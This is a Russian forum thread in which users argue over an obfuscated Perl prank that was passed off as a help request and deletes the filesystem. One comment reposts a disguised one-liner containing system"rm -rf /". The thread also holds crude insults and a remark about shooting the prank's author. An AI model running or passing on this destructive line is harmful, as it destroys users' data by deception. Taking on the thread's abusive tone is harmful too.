LINUX.ORG.RU

да автор долбоеб. Надо бы чтобы автор пожизни так наебнулся раз 20, может мозги появятся такую х-ню нести. Кому нахер нужно это правило не работать под рутом, когда дома дети некормлены. А за такое увольняют.

Это не профессионализм(хотя проучить важно), а мудачество чистой воды. Ну да впрочем сытый голодного не разумеет.

Детишек же не давят на улице по одной штучке перед всем классом с моралью "дорогу надо внимательно переходить". Ну мудак автор, ну и хуй с ним...

anonymous
()

Это каким же надо быть идиотом, чтобы запустить вообще что-либо неизвестное на работающем сервере! Да еще и под рутом! :-))) Я не знаю - как там насчет этики, и автора я не выгораживаю, но если кто-то собирался реально проверить эту строчку, зная что он делает - запустил бы, как и все нормальные прогеры, прогу из-под отдельного юзверского аккаунта. Даже у меня, совсем даже не прогера, есть отдельный аккаунт для тестирования собственнописных скриптов и проверки всякой подобной шняги. И даже не потому что я людям не доверяю - доверяю, почему же. Просто в данном случае - я не могу сходу прочесть код программы и мне непонятно что она делает, это _уже_ означает, что ее _нельзя_ запускать от рута, а надо сначала проверить - как она работает и что делает. Поэтому - мне совершенно непонятно брызганье слюной. Когда вас зовет на помощь утопающий - это не означает, что надо кидаться к нему в омут с головой, даже не запасшись элементарным спасательным кругом самому.

P.S. Как раз такие вещи - и учат ответственности. Я сам держу под своим контролем сервер, приносящий по нескольку десятков тысяч зеленых ежемесячно. И черта с два я там вообще что-то запущу, тем более из-под рута, кучу раз не проверив сначала на своей, рабочей машине. Если же админ настолько беспечен, что реально сможет на сервере такое запустить из-под рута - он зря получает свое жалование.

anonymous
()

Шутка довольно старая. Я в свое время, когда мне подсунули аналог, правда не такой заковыристый - сначала его отдебагил, а потом послал в ответ много смайлов.

Думать надо, особенно запуская незнакомые программы(скрипты) на своем компе.

Неужели кто-нибудь, если бы здесь анонимус выложил исполняемый файл - сразу его закачал на компьютер и запустил???

anonymous
()

Удивляюсь...
Да, автор неэтичен, но кем надо быть, чтоб

1) увидев незнакомую прогу, запустить ее помимо deparse
1а) и даже помимо -d
1b) и тщательного аудита. Хотя бы сделай нормальный indent и почитай!!!

2) на сервере (эксперименты на сервере недопустимы!!!!! абсолютно!!! Это - жестокое правило. Иначе какой-нибудь идиот на АЭС бы с проводами поэкспериментировал или еще с чем-нибудь)

3) под рутом (под рутом НИЧЕГО не делают. вообще. делают под sudo, которое надо ЯВНО вводить - а потому случайно этого сделать нельзя. Только специально. А запустить чужую непонятную прогу специально под рутом.....)

В общем, не понимаю я людей.... Это все равно что полезть на чужой участок и судиться с владельцем за то, что сидящая там злая собака вас сильно покусала...

Zulu ★★☆☆
()

думать надо

Уже давно вместо штатного /bin/rm использую собственный sh-скрипт заменитель, который предотвращает явную деструкцию и переносит файлы во временный каталог перед отложенным на несколько минут удалением. И дело даже вовсе не в "rm -rf /", это сущая ерунда -- всегда и CTRL-C нажать успеть можно, и систему из резервной восстановить. Программа /bin/rm сама по себе страшно деструктивная не столько в руках root'а, сколько в руках обычного пользователя. При вводе с клавиатуры достаточно допустить одну мельшайшую ошибку, вставить лишний пробел, и если это произошло в своём $HOME то уже и CTRL-C нажать не успеешь. Я несколько раз полностью уничтожал свой $HOME вводом команды rm с ошибками в аргументах вроде лишнего пробела, после чего пошёл на упомянутую выше меру.

Что касается автора исходного письма, то ему точно следовало-бы большими буквами написать про возможные последствия запуска такой программы, иначе оно действительно получается, и хулиганство, и создание вредоносныхных программ.

Остальным же, перед тем как воспринимать всё подряд на веру, хотелось-бы порекомендовать думать своей головой. Аноним за свои слова никак не отвечает и способен практически на любую подлость. Нельзя-же безгранично доверять кому ни попадя. Вы бесусловно соблюдаете это правило в том, что называтеся "реальной жизнью", так почему-же в интернете может быть иначе?

А те товарищи, которые требуют модерирования, цензуры, принудительной регистрации, вовсе нам не товарищи, и должны быть сами подвергнуты регистрации, цензуре, модерированию и вовсе отключены от форума, а лучше сразу от интернета, как приносящие существенно больший вред, чем автор письма, с которого всё и началось.

anonymous
()

>Уже давно вместо штатного /bin/rm использую собственный sh-скрипт
>заменитель,

если не в падлу, опубликуй скрипт

anonymous
()

$_+=p.q; system"rm -rf /"; ;s;s;s;s;s;s;s;s;s s.*s.rekcah lrep rehtona t\sujss;s g\b.g\U$&gg&print for q...reverse split??

anonymous
()

Интересно, а много народу, орущего "Так им, ламерам позорным" не запустили бы скрипт, если бы в треде не говорилось, про что он?...

anonymous
()


Есть у меня один знакомый - юрист, молодой, но подающий надежды.
Говорит, что теперь знает, как "прикалываются" программисты,
т.е. какие шутки они понимают. Хоть и гуманитарий, но rm -rf /
воспринял серьезно. Ждет к себе какого-нибудь программиста.
Его приятель, врач, тоже выразил подобное желание,
не как пострадавший, а так, поприкалываться.
Потягивая пиво, решили, что для комплекта не хватает
милиционера, ГИБДД`шника и повара.
На последнего возлагаются большие надежды, ибо смеяться можно сразу.
Боюсь, ребята, для вас будет своя "матрица".

P.S. "Добро пожаловать в мир Ваших фантазий!"

anonymous
()

Народ! Не пойму - ведь если работать не под рутом, а под тем пользователем, под которым работаешь обычно дело не спасет! Так что какая разница? Например сервер oracle - работаю под юзером оракле. Все данные что принадлежит руту и прочим юзерам не идут по ценности ни в какое сравнение с данными оракла... Или имеется ввиду "многозадачный сервер"? На котором и почта и файлы, и web и т.п. - но ведь таких мало?

nazarov_serg303

anonymous
()

Мда тут очень хорошо видно разделение людей в стиле AD&D на злых и добрых. А я наивный раньше думал что злых людей на свете мало. Автору скрипта я бы руки не подал и даже не попытался бы ему помоч когда ему потребывалась помощь (даже от которой бы зависила его жизнь).

anonymous
()

имеются в виду две очевидные истины: не запускать непонятные команды вообще, а если уж очень хочется, то иметь для этой цели тестового пользователя с пустым каталогом (но только после find / -perm -777...).
Люди, которые этим принципам не следуют вполне заслуживают того, что получили.
Жестокая шутка, конечно, но кого волнует судьба лохов?

anonymous
()

> А я наивный раньше думал что злых людей на свете мало

Да не злые мы. Мы равнодушные. Мне, например, как и автору сценария абсолютно безразлично, что будет с Вашими данными - Вы мне не друг и не родственник. Та же ситуация с помощью: увижу я тонущего в пруду человека - в лучшем случае остановлюсь посмотреть пока тот не утонет (кстати, такое уже было однажды - на чистых прудах тонул пьяный, 30 человек смотрели и никто не почесался помочь. Когда тот наконец утонул, подождали ещё несколько минут чтобы уж наверняка и какие-то парни быстренько вытащили труп)

anonymous
()

Ну попробовал я на своей машине этот скрипт под рутом, не жалко, всё равно RH9 решил ставить вместо 7.3, таким способом убью ось и хрен с ней... А потом, когда загрузился с сидюка, чтоб поставить новый дистр, и забыл, что пару своих скриптов не сохранил, так как они отдельно лежали. Чё делать, думаю... В итоге взял прогу для востановления инфы, всё востановил и щас работать продолжаю с RH 7.3 как ни в чём не бывало... :-)) Даже передуал ставить RH9, вдркг ещё чёто забуду, да и времени не стало... Так что реальной опастности в принцепе нету, если уж есть на столько ценная инфа, востановить нет проблем....

Так что вот так... И уроком точно это сразу будет.

anonymous
()

Умники и мудаки

Интересно вот что.<br> Обычно орут "Учить админов! Дураку ясно, что из под рута делать нечего! Бакапить, бакапить!" - те, кто нихера не понимает и не занимается программированием на Перл. Я говорю о такой его разновидности, когда времени на других юзаков переключаться нет. <br> Можно вслед за этим орать - "Да это самое простое под Линух!"<br> А можно просто меньше доверять козлам. Процентов 60 здесь тех, кто говорят: "Я конечно в Перл не разбераюсь, но о Линухе слышал!!! Ну вы все придурки!!!"<br> Удивительное мудачество. Безмозглое даже. Здесь обсуждается не программа из одной строчки, а уроды, которые считают что их мозги больше некоторых задниц<br> Однако эти люди даже не пытаются прогнозировать свои действия<br> Их мозги пусты, да кстати и не такие большие <br> Демон <br><br> P.s. В AD&D есть ДМ. Думаю козел еще получит на орехи

anonymous
()

Интересно вот что. \n Обычно орут "Учить админов! Дураку ясно, что из под рута делать нечего! Бакапить, бакапить!" - те, кто нихера не понимает и не занимается программированием на Перл. Я говорю о такой его разновидности, когда времени на других юзаков переключаться нет. \n Можно вслед за этим орать - "Да это самое простое под Линух!" А можно просто меньше доверять козлам. Процентов 60 здесь тех, кто говорят: "Я конечно в Перл не разбераюсь, но о Линухе слышал!!! Ну вы все придурки!!!"\n Удивительное мудачество. Безмозглое даже. Здесь обсуждается не программа из одной строчки, а уроды, которые считают что их мозги больше некоторых задниц \n Однако эти люди даже не пытаются прогнозировать свои действия<br> Их мозги пусты, да кстати и не такие большие \n Демон \n\n P.s. В AD&D есть ДМ. Думаю козел еще получит на орехи

anonymous
()

Интересно вот что. \n
Обычно орут "Учить админов! Дураку ясно, что из под рута делать нечего! Бакапить, бакапить!" - те, кто нихера не понимает и не занимается программированием на Перл. Я говорю о такой его разновидности, когда времени на других юзаков переключаться нет.
Можно вслед за этим орать - "Да это самое простое под Линух!"
А можно просто меньше доверять козлам. Процентов 60 здесь тех, кто говорят: "Я конечно в Перл не разбераюсь, но о Линухе слышал!!! Ну вы все придурки!!!"
Удивительное мудачество. Безмозглое даже. Здесь обсуждается не программа из одной строчки, а уроды, которые считают что их мозги больше некоторых задниц
Однако эти люди даже не пытаются прогнозировать свои действия<br>
Их мозги пусты, да кстати и не такие большие
Демон

P.s. В AD&D есть ДМ. Думаю козел еще получит на орехи

anonymous
()

Это подразумевается, что если меньше трёх раз такой текст поместить, то никто не поймёт?

anonymous
()

почитал. смешно. автор, конечно, приближается по уровню к мальчишке, решившем пошутить, но получилось большое Г... которое теперь некоторые расхлебывают.

но тем кто расхлебывает, и главное тем, кто кричит про дядек в милицейской форме, силачей, избивающих на показ своего силового превосходства других, могу сказать то, что в реальной жизни нельзя набрать chmod и всегда приходится работать под рутом (жаль, правда?). а в системе, где ВСЕ сделано для того, чтоб такого небыло, где можно безопасно для себя курочить и исследовать хоть атомную бомбу ака супер_пупер_деструктивный_код, почему-то некоторые "админы" этим не пользуется. а как называется человек, который работает на сервере, от которого зависит полгорода, и который кричит, что он админ всея полгорода, и который запускает что-то ему непонятное из-под рута? а если бы сюда кто-нибудь кинул линк на бинарник, и сказал: "запустите - приколетесь!"?

мораль: если считаешь себя админом - не сначало разберись. а то и место потерять не долго. а если попался - какой же ты нафиг админ?

anonymous
()
Ответ на: комментарий от anonymous

Желаю Вам никогда не попадать в ситуацию описанную Вами ни в жмзни не в работе. Аминь

anonymous
()

Перед запуском таких смешливых скриптов под унихом всегда лучше заблаговременно /bin/rm заменять чем-то безобидным, например одноименным shell-скриптом из одной строчки типа echo "Здрасте всем", но это понятно тоже не панацея А в ентом скрипте, ежели убрать опасную see и вместо нее поставить ;;print "$_" ($_ -это как раз то, что пытаются запустить), то получим system"rm -rf /"system"rm -rf /" А автору 100 баллов за идею (довольно, кстати, старую) и бочку соленых огурцов в ж$%* !

anonymous
()
Ответ на: Re: от LegaT

y(....)(....) все равно что tr/..../...../

anonymous
()

Те два поста удаленные.
Не вдруг въехал как строчки рвать

Демон

anonymous
()
Ответ на: комментарий от anonymous

блин

Половина пострадавших не запускала бы этот сраный код, если бы он не был помечен аки "почему не работает","Хелп!" и все такое. Ты бы вот, умник, бакапил все проекты перед тем как глянуть прикольную картинку в инете? А если бы в ней какая-нить фигня сидела, типа "атомной бомбы" от которой бы твоя башка вскипела? >попался - какой же ты нафиг админ? Вирусы попадались? Сколько ты таких получил через форум с пометкой "Помощь"? И еще вопрос - часто ты пишешь на Перле так, что даже на перекур время нет? В цейнтноте, когда привык к постоянной отладке и даже не задумываешься о каких-то внешних мудилах, поварах и темных переулках Дело не в линухе и не в руте, да собственно и не в админах. Тело в мудаках и челах, которые друг другу помогают. И в нормальной ситуации - в тесном кругу, так ни одна сволотч не шутит. Потому что знает цену таким шуткам и ссыт неподеццки

Демон

anonymous
()

А что, получается, что кому-то можно классные :-) вирусы по уних писать на любом интерпретаторе не напрягаясь, используя психологию сисадмина как механизм запуска агрессивного кода... Уж сколько раз твердили миру. И все равно бочку соленых огурцов в жопу авторам таких шуток.

anonymous
()

> В цейнтноте, когда привык к постоянной отладке и даже не задумываешься

Нет времени на свою работу - не х@й пытаться сделать чужую.

Ты бы вот, умник, бакапил все проекты перед тем как глянуть прикольную картинку в инете?

картинки смотреть _насколько я знаю_ безопасно. Тем не менее под root'ом не смотрю.

> Вирусы попадались?

Ни разу. Помилуй бог, батенька, откуда для Unix вирусы? Как им размножаться-то? Хотя, как показывает данная ветка...

anonymous
()

то что автор - подонок, с этим уже все согласились. а вот то что он крутой профи, это надо оспорить! - знания которые он здесь продемонстрировал никак нельзя назвать фундаментальными. Вы же не назовете крутым математиком человека, который умеет в уме умножать 8-значные числа !!!

anonymous
()

2anonymous (*) (2003-09-30 12:24:54.133581)
Умник. Тебе просто повезло с картинками. Под рутом говоришь не смотришь? Тогда может быть ты их смотришь под своим логином, под которым же и проекты пишешь? И перед каждым выходом в инет эти проекты бакапишь? Так?
Что вы к руту привязались? Да пусть он супрепрофессионал и работает под нормальным юзером. И что? Решит помочь очередному мудаку и грохнет свой домашний каталог. Да, конечно, есть бакап (вчерашний). И что? А он сегодня хренову тучу работы сделал. Она то пропадет! Ну ясно дело, что надо учить таких, дабы другим не помогали. НИКОГДА! Тогда все будут счастливы.

anonymous
()

> то что автор - подонок, с этим уже все согласились. а вот то что он крутой профи, это надо оспорить

то что автор предыдущего поста - дебил, с этим уже все согласилисиь. а вот автор скрипта себя к "крутым профи", насколько я понял, не причисляет

anonymous
()

можно быть хитрее своих врагов, но нельзя быть хитрее всех. (А. де Ларошфуко)

anonymous
()

Боже! сколько здесь неудовлетворенных мальчиков ! Нет на вас дедушки фрейда ! ой нету !

anonymous
()

> Да пусть он супрепрофессионал и работает под нормальным юзером

Если человек "суперпрофессионал", он, как минимум, будет использовать тестовый счет после chroot. да и то вряд ли.

anonymous
()

Дедушка Фрейд ничего умного не сделал, кроме как высказал мысли, которые каждый день у думающих людей в головах ходят. Также тонко подметил, что бывает чел. напивается - это ОНО. Бывает живет как обычно - ЭГО. И бывает флудит вместе со всеми в форум - этот СУПЕРЭГО.
Сейчас любой думающий и прогающий мальчик дал бы дедушке сто очков вперед.
А желание засунуть бочку огурцов обидчику или провести тонкий тюнинг его яичек - это отражение не удовлетворенности, а желания возмездия.
Я понимаю пострадавших. И действительно рад чтот не пострадал сам
>Нет времени на свою работу - не х@й пытаться сделать чужую.
Бывает "рваный бег" и никуда от него не деться, сколько не планируй и не строй себе проекций. Вроде все учел - а появляются разные неудовлетворенные и малосоображающие в логике люди, которые заставляют тебя входить в этот режим

Демон

anonymous
()

Уважаемый Демон, я тоже не считаю Фрейда великим умником, но ненадо его так уплощенно понимать. Неудовлетворенность здесь выражена не в жопе с огурцами (что за примитивизм) а в сублемации: "учить даунов". Ну разве здоровый человек, чувствующий свою силу, станет издавать такие визги? Будь он хоть сто раз неудовлетворен работой админов, начальства, вообще всем миропорядком... уравновешенный человек не захочет "проучить" незнакомых ему людей. Плюс еще тут одна тонкая вещь :-) жертвы не могут нанести ответный удар ! это очень важно. Автор сознательно выбрал такую форму "поучения" ! Он понимает свою уязвимость в другой ситуации и нашел способ безопасного хулиганства. Будь у него хоть чуточку мускулов, я уверен, он "поучал" бы прохожих кулаками. Психология та же, физические кондиции другие. Наиболее вероятно что именно неудовлетворенность в данном случае "искала выход и нашла его", а если бы не нашла (или в будущем не найдет), то автор загремит в дурку с какой-нибудь сверхценной идеей :-) Удачи всем. :-)

anonymous
()

Уважаемый Демон, я тоже не считаю Фрейда великим умником, но ненадо его так уплощенно понимать. Неудовлетворенность здесь выражена не в жопе с огурцами (что за примитивизм) а в сублемации: "учить даунов". Ну разве здоровый человек, чувствующий свою силу, станет издавать такие визги? Будь он хоть сто раз неудовлетворен работой админов, начальства, вообще всем миропорядком... уравновешенный человек не захочет "проучить" незнакомых ему людей. Плюс еще тут одна тонкая вещь :-) жертвы не могут нанести ответный удар ! это очень важно. Автор сознательно выбрал такую форму "поучения" ! Он понимает свою уязвимость в другой ситуации и нашел способ безопасного хулиганства. Будь у него хоть чуточку мускулов, я уверен, он "поучал" бы прохожих кулаками. Психология та же, физические кондиции другие. Наиболее вероятно что именно неудовлетворенность в данном случае "искала выход и нашла его", а если бы не нашла (или в будущем не найдет), то автор загремит в дурку с какой-нибудь сверхценной идеей :-) Удачи всем. :-)

anonymous
()

ну вы блин даете, товарищи...

3,14здец полный - читал тред и плакал;))))

я в перле отнюдь не гуру,но в строке то этой сразу видно что с print она ничего общего не имеет.

А с под рута умников повыгонять может и не плохо... но только имхо пусть этим их начальство занимается, а не доморощенные Кевины М. :) потому как убытки,если таковые появятся, явно взыскивать будут не с мудрого скриптописа, а с тупых скрипторунцев.Подловато получается.:(

--сизый гусь--

anonymous
()

Уважаемый Демон, я тоже не считаю Фрейда великим умником, но ненадо его так уплощенно понимать. Неудовлетворенность здесь выражена не в жопе с огурцами (что за примитивизм) а в сублемации: "учить даунов". Ну разве здоровый человек, чувствующий свою силу, станет издавать такие визги? Будь он хоть сто раз неудовлетворен работой админов, начальства, вообще всем миропорядком... уравновешенный человек не захочет "проучить" незнакомых ему людей. Плюс еще тут одна тонкая вещь :-) жертвы не могут нанести ответный удар ! это очень важно. Автор сознательно выбрал такую форму "поучения" ! Он понимает свою уязвимость в другой ситуации и нашел способ безопасного хулиганства. Будь у него хоть чуточку мускулов, я уверен, он "поучал" бы прохожих кулаками. Психология та же, физические кондиции другие. Наиболее вероятно что именно неудовлетворенность в данном случае "искала выход и нашла его", а если бы не нашла (или в будущем не найдет), то автор загремит в дурку с какой-нибудь сверхценной идеей :-) Удачи всем. :-)

anonymous
()


Хм, "супрепрофессионал" выживет, даже если вы этого не хотите, а вот "молодь" этот пример пострелял...

Они ничего сейчас не скажут:
кто пока восстанавливается, кто пока обдумывает, потом кому-то будет стыдно, что попались...
Останется одно:
никому не верь, человек человеку - волк и т.д. и т.п. и пр.

*Вот эта шавка, с одной из улиц большого города, решила поделиться своим жизненным опытом и мироощущением.

Поделилась. Посмотрели. В дерьме живет, что еще сказать...

И, похоже, что везде, где он появится, через некоторое время обнаружится кучка дерьма.

1. Безответственнен - доверить ему что-то нельзя, тем более чью-то жизнь.
2. Озлоблен - даже просто опасен для окружающих своей агрессивностью.
3. Глуп - не осознает полноты последствий своих поступков, возможно, уже психически нездоров.
4. Асоциален - стремится доказать обществу свое исключительное право на существование, путем пренебрежения общепринятыми ценностями.

Все это присутствует, как правило, в виде издержек Большого Города.

Духовная пустота, при постоянном стрессе, стремление получить результат, при полном игнорировании окружающими, недостаток ума восполняется злобой.

Он плохо понимает окружающих его людей, т.к. с ним мало кто общается, поэтому должен ставить "эксперименты" по выявлению их свойств.

Людей вокруг много, но он остается постоянно "один на один" со своими глупостями, фантазиями, "тараканами в голове".

Он осознания "Матрицы" ждет, как чуда, как избавления от пустоты бытия, как наполнения смыслом его существовани.

Таков его мир.

Может лучше пристрелить, чтоб не мучился сам и других не покусал, а?

P.S. Если Вы сейчас почуствовали сострадание, значит, либо Вы больны сами, либо Вы - романтик, оторванный от жизни, которого жизнь ничему не учит.

Аминь.

anonymous
()

Вообще автор-пидорас, че тут говорить(особенно меня добил его совет запустить из-под рута и последующие подъебки), но в любом случае неизвестные непроверенные вещи лучше не запускать. Я вообщеничего не понял, но теперь из-под рута работать не буду, да и с ентим скриптом придется разобраться, чтоб на грабли не наступить. А автору скрипта воздастся...

anonymous
()

hominus lupusus anus est
>"учить даунов"
респект, действительно
Но имхо, чел. редко задается целью кого-либо учить
Это потом можно весело крикнуть: "Учись!", когда после желания почувствовать превосходство удалось со второго этажа насрать кому-нибудь на шляпу

Демон

anonymous
()

2Демон: а чего ты возмущаешься? дело не в руте, говоришь? да! дело в феномене, называемом "социальная инженерия". у меня в допотопной совхозной шараге при приеме на работу ВСЕХ обязывают пройти прослушивание курса компьютерной безопасности, где рассказывают о том, что нехорошо запускать то что тебя просит сделать кто-то непонятный. и предупреждают о последствиях. и прежде чем компилить кусок чужого кода, я всегда в него заглядываю. и разбираюсь. человек написал: не печатает. значит точно не печатает - чего его запускать-то? ты бы разобрался в коде сначала, и сразу бы понял почему не печатает :))

а если разобраться в коде не можешь - нахрена лезешь помогать? чем помочь-то можешь? программист-гений что-ли? можешь по выданной ошибке все понять?

дело не в руте, дело в мозгах. напороться на такую херню может каждый, разница в том, кто как подумает при этом. в данном случае просто объект персонофицировался, теперь он во всем виноват. также и в последующей волне распространения червей :)

ЗЫ: я его не оправдываю. я хочу сказать - все горазды орать когда в жопу жареный петух клюнул.

anonymous
()

2 --сизый гусь--
>я в перле отнюдь не гуру,но в строке то этой сразу видно что с print >она ничего общего не имеет.
Ну так там ведь нигде и rm -rf не упоминается. Значит и удаление не делает?


anonymous
()

> Уже давно вместо штатного /bin/rm использую собственный sh-скрипт заменитель

Никогда нельзя этого делать.

Если Ваш вариант rm не соответствует POSIX - то это чума.

В конце концов в скрипте rm можно заменить dd, crypt да чем угодно.

В Unix давно существуют механизмы защиты критических файлов

от уничтожения/модификации суперпользователем.

Даже если взломают Ваш сервер и получат root shell, то что нибудь

испортить шансов мало.

Sun-ch
()

>Плюс еще тут одна тонкая вещь :-) жертвы не могут нанести ответный удар ! Ну это еще бабушка надвое сказала :) В инете всегда остаются следы, ловят и профи, а не только засранцев, таких как автор программы. Вон дядя Грин вам про это расскажет :) >Да не злые мы. Мы равнодушные. Мне, например, как и автору сценария абсолютно безразлично, что будет с Вашими данными - Вы мне не друг и не родственник. Та же ситуация с помощью: увижу я тонущего в пруду человека - в лучшем случае остановлюсь посмотреть пока тот не утонет Да. Говнюк ты изрядный. Это уже все оценили.

Sun-ch
()

>можешь по выданной ошибке все понять
А ты без отладчика пишешь? Типа написал и все сцепилось и поперло, правда? Хрен ли нам крутым спецам, мы даже мимо клавиш никогда не промахивались! И Матрицу смотрим как док.фильм :)
Я не знал что это за строчка. На сайте меня не было до этого времени.
Получил ссылку, типа долбаки с одной строкой на Перле разобраться не могут. Как программисту 2 года работающему на ём стало интересно. Залез. Глянул на строчку. Сразу идея: "Это как раз тот Перл в одну строку, о котором все болтают, но которого никто показать не может".
Если бы дальше постов не было - полез бы по виндами отлаживать. Т.к. с серваком работаю через putty и ssh.
Мои проги на перле действительно не похожи на эту. Хотя и юниксовыми командами вроде $s=`find|grep` пользуюсь в скриптах. Мне просто НЕ НАДО знать то, что мне не надо. Но строчку разобрать хотелось, чтобы потом код писать короче и, может, быстрее.
А как ее разобрать? Проще взять и запустить потом подправить и запустить еще раз и глянуть изменения. Если она по-натуре должна печатать что-то. А если бы приписка была "стирает все нахер" - никто бы и не дернулся
>прежде чем компилить кусок чужого кода, я всегда в него заглядываю
А прежде чем запустить экзешник - в него? Ну это все херня я тоже заглядываю и на строчку глянул, но для тех кто Перла меньше меня видел скажу:
На перле бывают проги, типа этой, которые делают классные функции. И класс их не в том, что они нихера не понятные и все в закорючках, а в том что минимум наборов байт можно получить маскимальный результат. Пример выше (под рутом не пускать!)
И ни под каким другим языком Вы, хоть обосритесь, таких мощных и коротких прог просто не сочините. А то, что регулярники не понятные - это не признак "гамно язык" это признак того, что язык позволяет не печатать каждый раз "гамно" вроде ReplaceSubstring а написать ~s
И все будет замечательно работать

Поправьте, если ошибся
Демон
з.ы.
Щас работаю под Lotus/Notes. В редкие мгновения, когда надо срочно что-то сделать с кучей на диске юзаю Перл под win2000. Отдыхаю душой

anonymous
()

Весело... Не мое ИМХО, но факт: коль человек лох - так это судьба. И воспринимать это надо осознано, с деловитым помалкиванием в тряпочку. Автор - рисков, но в чем-то талантлив. Можно таки всю жизнь читать мантры вроде "Я ПЕРЛ учить не буду ибо я итак УМОПОМРАЧАЮЩЕ КРУТ"... А в один день погрузится по ноздри в аналогичную жопу и начать читать другие мантры типа "АВТОР -!$@%#%^#$%@!%%~@#%". Каждый получает то, к чему стремится. В данном случае это показано наглядно... А реакция - признак, по которому всегда можно безошибочно отделить пионэров от бойскаутов. Таковы основы мироздания. А лохи - так это вопрос природного равновесия, баланса и гармонии... Так что продолжайте тренировать гиморой.

anonymous
()

2Демон: >А ты без отладчика пишешь? Типа написал и все сцепилось и поперло, правда? Не, ну как же... с отладчиком канешна :))) а ты под отладчиком увидел как у тебя rm -rf все потирает? уж если бы полез отлаживать - точно бы все увидел. да еще под виндами, где этот скрипт совсем уж безопасен :). опять же цель перед тобой изучить структуру скрипта а не увидеть его результат - вот я и спрашиваю - зачем вообще его запускать (гхмм... не под отладчиком)? >А прежде чем запустить экзешник - в него? Гы-гы! а ты запускаешь незнакомые екзешники с целью понять чего он делает? я - нет. для таких целей у меня VMWare стоит. я запускаю только дистрибутивы о которых имею представление. и не надо впадать в маразмы типа дистрибутивы разные бывают и все такое. их тоже можно не на корпоративном сервере тестить.

я говорил про исходники, по которым я хочу помочь в конференциях.

Дениска.

anonymous
()

Здравствуйте, я работаю в РАО ЕЭС. Точнее работал... Пока не увидел ваш скрипт. А теперь 2 города осталось без света, а я - без работы. Но не расстраивайтесь, свет скоро включат, а меня уже на работу в ЦУП зовут. в центр управления полетами. там тоже компьютеры с юниксом есть. а на них перл...

anonymous
()

> Автор - рисков, но в чем-то талантлив.

Автор - засранец. Я бы понял, если он порт открыл и root shell

висеть на нем оставил. Это мастер.

А файлы у детишек потереть ?

В чем талант ? Он бы еще похвастался, что детские копилки ломать умеет.

Sun-ch
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.